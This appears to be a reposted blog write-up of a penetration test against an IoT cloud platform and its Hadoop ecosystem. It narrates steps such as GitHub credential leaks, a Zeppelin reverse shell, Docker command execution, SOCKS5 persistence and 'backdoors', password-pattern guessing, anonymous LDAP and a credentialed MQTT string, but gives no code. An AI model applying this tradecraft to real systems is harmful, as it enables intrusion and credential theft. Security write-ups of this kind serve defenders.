Article 70: Remember the entire process of penetrating an Internet of Things cloud platform and Hadoop ecosystem

9cb790244223bad6115473f112b6e7d1.png

 Part1 Preface 

Hello everyone, my name is ABC_123 . This issue shares a previous penetration test case for an Internet of Things cloud platform, including the intranet horizontal process of the Hadoop ecosystem. Since many intranets include components such as Yarn, MapReduce, Spark, HDFS, Ambari, and Hortonworks , I rarely encounter it at ordinary times, and thus began a 3-month process of studying and researching intermittently.

During this period, I basically tried all the vulnerabilities of Hadoop components published on the Internet. With unremitting efforts, I finally achieved a lot of results. Today I will review and summarize what I have learned before.

It is recommended that everyone set the public account "Xitan Laboratory" as a star, otherwise you may not see it! Because official accounts can now display large image push only for frequently read and starred official accounts. How to operate: Click [...] in the upper right corner, and then click [Set as Star].

02debb8a893a189ddb8cf1d766d86fc8.png

 Part2 Prerequisite knowledge 

First, let’s introduce the Hadoop ecosystem so that everyone can get started, otherwise you may not understand the following articles.

0560a600454705afea729fd75961cbe6.png

Ambari: If Hadoop is compared to a large technology park with multiple buildings and various facilities, including a large number of servers, storage devices and data processing components, Ambari is equivalent to the management office of the park. It provides a centralized interface and tools for managing and monitoring all aspects of a Hadoop cluster, including cluster configuration and installation, service monitoring and resource usage, resource scheduling and allocation, fault diagnosis and log analysis.

YARN: YARN is Hadoop's resource manager, responsible for underlying resource management and task scheduling; while Ambari is a cluster management tool used to configure, deploy and monitor Hadoop clusters and related services.

KDC key distribution system: It can be compared to a component similar to the access control system. Before entering the Hadoop campus, when you arrive at the access control, you provide your identity information and pass the identity verification. The access control center KDC will issue you an access token TGT, allowing you to Access a variety of facilities and resources on the Hadoop campus. In a Hadoop cluster, the KDC acts as an access control center to ensure secure communication and resource access within the cluster. Similar to a campus access control system, it ensures that only authorized personnel can enter the campus and access various facilities.

HDFS: Hadoop Distributed File System, likened to a data storage center or data warehouse in the campus.

Spark: Likened to a high-performance computing center or supercomputer on campus.

MapReduce: Divide data processing tasks into multiple subtasks that are executed in parallel, and assign these tasks to different nodes in the cluster for calculation.

The relationship between HDFS, HIVE, and Hbase is as follows:

8a62c180058fe884ad3038fa02419dcd.png

The relationship between Pig, Impala and Shark components is as follows:

467fa576722ed1b58b1c834cf2041352.png

To sum up, Pig is suitable for flexible data processing and transformation; Impala focuses on real-time query and analysis of structured data; while Shark/Spark SQL combines the capabilities of data processing and real-time query, and has better performance and interactivity.

The relationship between MapReduce, Spark, and Tez is as follows:

d23553b86ff03f7edce507720ce2d194.png

MapReduce is suitable for offline batch processing jobs; Spark provides a wide range of data processing functions and memory computing capabilities; Tez provides more efficient job execution through the DAG execution model and optimization strategy. Each of them has different characteristics and advantages when processing large-scale data.

 Part3 review process 

First of all, I will release a flow chart about this project drawn by ABC_123. Since the original picture is lost, the picture below is a small picture I found by "rummaging through boxes and cabinets". Then it was enlarged by AI picture processing software. Basically, it can only be processed This level of clarity is achieved. If you have the energy to draw another picture later, I will tell you the key steps of this penetration work.

e821a0ce3685b0d4f9c6865ef562bce3.png

This picture is a reduced version of the above picture. Different colors represent different components. Both pictures were made using the foreign maltego (intelligence analysis) tool. They were recorded while infiltrating, but this tool is basically no longer used.

a68a6636e7a97e582637ee6d8b6f872f.png

  • External network management process

Since we rarely encounter penetration work into the IoT cloud platform and Hadoop ecosystem, many of the systems were seen for the first time, and there were very few external network assets, so the process of external network management was extremely difficult. Finally, in the first two weeks, we deployed There are 2 entry points.

 1 Zeppelin background rebound shell

Zeppelin is an open source data analysis and visualization platform that provides an interactive environment that allows users to use multiple programming languages ​​​​for data analysis and processing. It also provides rich data visualization functions. In this project, it is combined with Hadoop Many components of the ecosystem are integrated and used.

First, I searched the source code of various subdomains of the website through github , and accidentally found a java code, which directly wrote the clear text Zeppelin username and password (the picture below is the rendering, not the original picture).

29c4fb51b3bebabf1428b961c4e1bdc1.png

Next, use the username and password to directly log in to the Zeppelin backend.

100d8333e878cfb9fb7caea001d4bae0.png

There are many methods for executing system commands in the background of Zeppelin on the Internet. Generally, the points for executing commands are as shown in the figure below. However, I remember that in this actual penetration, all the methods on the Internet were not easy to use. So I read the Zeppelin instruction manual for more than a day and found another location where I can execute any cmd command code. It is not available here for the time being. You can try it yourself.

7cfb6801366bbf271ec3ac2020ed51af.png

In this way, the command is executed in the background through Zepplin, directly rebounding a Linux shell, and injecting the Socks5 agent program.

 2 There is a network isolation problem when deploying Docker on the IoT cloud platform

This is another entrance to the external network. Ordinary users can register an account and log in to the backend to deploy Docker. Users can freely choose docker environments such as Nginx, Httpd, Mysql, Nodejs, etc. So I came up with an idea, will there be any problems with docker's network isolation? So I deployed various dockers one by one, and there were no security issues. When I was about to give up, I deployed a nodejs application, and the cmd command can be executed on the management interface of the application (the following is the rendering, not the original image).

37d79cc75dfc9ff921e364e5d31edd4d.png

As shown in the figure below, the deployed docker application has a cmd command operation interface, which can directly execute commands with echo. Moreover, this docker can connect to the external network. Subsequent penetration found that this docker can actually directly connect to the hadoop ecosystem . Some components , such as accessing hadoop with unauthorized access, accessing Spark system, accessing zabbix, etc.

5ac018f97cef447ef29b4270a9606d3b.png

  • Permission maintenance issues

There is a key point here, how to maintain the permission for 3 months, the general method is as follows:

1.  Since the Zeppelin application is a non-docker environment, the rebound Socks5 proxy is relatively stable and is mainly used to deal with operations with relatively large traffic and intranet vulnerability scanning that consumes system performance.

2.   Docker’s socks5 proxy is mainly used as a backup solution for permission maintenance. This docker container is very unstable. The proxy traffic will be interrupted once the proxy traffic is large. Once the multi-threaded scanning tool is run, it will freeze. So I applied for multiple accounts and deployed multiple docker applications in the background. Each docker created a socks5 proxy and used different socks5 proxy IPs.

3.   Docker’s socks5 agent combines the zabbix permissions of the intranet. Subsequent administrators often shut down the Zeppelin system . Fortunately, zabbix on the intranet is vulnerable. First, access the intranet through the socks5 proxy of docker, and then run the scanning tool on zabbix on the intranet. Once this entrance was closed, I had a plan B.

Summary: Leave multiple socks5 proxy entrances, use different proxy IP addresses, and then basically only use one or two of them throughout the process, leaving one or two entrances that are never used.

  • Intranet Horizontal of the Hadoop Ecosystem

 1 Ambari administrator privileges

The administrator password of this system was eventually guessed. For example, if the website is www.xxx.com, Ambari's weak password is xxx@2022, which is the domain name + @ + year combination .

bcfe9cf09ed308c8d68497017d9be3da.png

 2 KDC key distribution system vulnerability

This system was acquired more than 2 months into the project. At that time, I looked at almost all types of hadoop components, except for the three most important IPs of the KDC key distribution system. At first I thought that this KDC key distribution system was unlikely to have important vulnerabilities, but the results were shocking. I didn't expect that there was a major gain.

After a full port scan of these three IPs, we found that port 389 was open. We guessed that this was the LDAP service of the KDC key distribution system. We used an ldap connection tool to try to connect. At first, we were trying to query the domain name of the ldap service, but we were actually connected. LDAP database now! I remember it very clearly at the time. I thought I was dazzled. The LDAP service actually enabled anonymous login . This was really a serious vulnerability.

So I next looked at the LDAP services of the other two KDC systems. One of them can log in anonymously, but the other cannot. Finally, I spent a long time browsing in the ldap service. Basically, all the passwords of the entire hadoop ecosystem are stored in it. The password of the Spark system is in clear text, and some components seem to be encrypted. I can’t remember the specific situation (below) The screenshot is a screenshot of the virtual machine test environment).

c6374c35b5c34227ed93cbfba0824778.png

In the end, this ldap anonymous login problem led to the collapse of the entire Hadoop ecosystem and was the most serious security issue discovered in the intranet. Moreover, the administrator password of the Spark system is basically universal, and many external systems can use this account and password to log in.

  • Security issues of MQTT protocol for external network applications

MQTT (Message Queuing Telemetry Transport) is a lightweight communication protocol mainly used for real-time messaging between IoT devices, sensors and applications. See the figure below for explanation.

325451357c9176576cc37b13e5bd69d6.png

As shown in the figure below, you can use the Spark administrator's password obtained above to log in to a web application system on the external network. After logging in to the backend, you will find a function similar to the figure below. Right-click F12 to see the clear text password (the following is the effect Picture, not original).

8627f10fc933fe050e4119bfab0ac37b.png

The final combination resulted in a connection string for the MQTT protocol: mqtt://uusfwefwfewf:[email protected]:8083/mqtt. Then I had a problem, how to use it? After consulting a lot of information, I found that there is a tool HiveMQ that can be operated, as shown in the figure below, it prompts "connected" and the connection is successful.

b8db0e3a5090f3f916c8d449c5a801ed.png

The security problem here is that the mqtt connection address allows login from any IP address, without trusted login, allowing any attacker to control IoT devices.

  • Summary of other vulnerabilities

I won’t introduce too much about the exploitation process of these vulnerabilities, I believe everyone is familiar with them. There is a mysql delayed injection vulnerability on the external network, as well as several unauthorized access vulnerabilities and logic vulnerabilities; the internal network includes the following vulnerabilities: zookeeper unauthorized access vulnerability, zabbix component rebound shell vulnerability, Spark system code execution vulnerability, various Hadoop unauthorized access vulnerabilities , some can directly download log files, intranet memchached unauthorized access vulnerabilities, etc.

92bb3462dc7cb6deb9b38009d43fd090.png

The main point mentioned here is that to exploit the Spark system code execution vulnerability, you need to load a jar package. The jar package for this vulnerability is best compiled under the jdk1.6 version , which has better compatibility. Then pay attention to the Spark system version and select Corresponding exp.

db9ae80dd6afe2cd2ce49cdbd96006ce.png

 Part4 Summary 

1.  The leakage of Github source code has become the most important breakthrough for external network management.

2. The network isolation of the Docker container was not done well, resulting in unauthorized access to some important components of the Hadoop cluster, resulting in the leakage of a large number of log files.

3.  The ldap service of the KDC key distribution system, the core of the intranet, allows anonymous login, causing the collapse of the entire Hadoop ecosystem.

4. The MQTT protocol does not set a whitelist IP to restrict its use, which also leads to important security issues.

5. Leaving a few more entrances and leaving backdoors through normal application functions is a good way to maintain authority.

141c15c102d38d9093115f8e13bd7130.png

The public account focuses on sharing network security technology, including APT event analysis, red team attack and defense, blue team analysis, penetration testing, code audit, etc. One article per week, 99% original, so stay tuned.

Contact me: 0day123abc#gmail.com(replace # with @)

Guess you like

Origin blog.csdn.net/m0_71692682/article/details/131908134